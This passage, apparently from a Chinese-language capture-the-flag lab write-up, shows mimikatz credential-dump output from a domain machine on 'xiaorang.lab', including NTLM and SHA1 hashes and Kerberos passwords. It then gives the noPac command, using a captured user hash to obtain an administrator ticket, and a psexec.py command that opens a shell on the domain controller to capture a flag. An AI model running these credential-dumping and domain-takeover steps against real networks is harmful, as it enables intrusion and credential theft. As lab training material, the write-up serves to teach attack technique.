* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 30205 (00000000:000075fd)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/1/26 15:45:46
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 27506 (00000000:00006b72)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2024/1/26 15:45:46
SID :
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : XR-LCM3AE8B$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/1/26 15:45:46
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-lcm3ae8b$
* Domain : XIAORANG.LAB
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
mimikatz(commandline) # exit
Bye!
获取到zhanghui这个用户以及它的Hash
zhanghui 1232126b24cdf8c9bd2f788a9d7c7e
nopac,只有zhanghui能成功,zhanghui在MA_Admin组,MA_Admin 组对computer 能够创建对象
proxychains python3 noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6
使用nopac申请到的cifs票据登录进入DC
export KRB5CCNAME=/root/Desktop/noPac-main/Administrator_xiaorang-dc.xiaorang.lab.ccache
proxychains4 psexec.py xiaorang.lab/administrator@xiaorang-dc.xiaorang.lab -k -no-pass -dc-ip 172.22.11.6 -target-ip 172.22.11.6 -codec gbk
成功拿到flag04
803
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
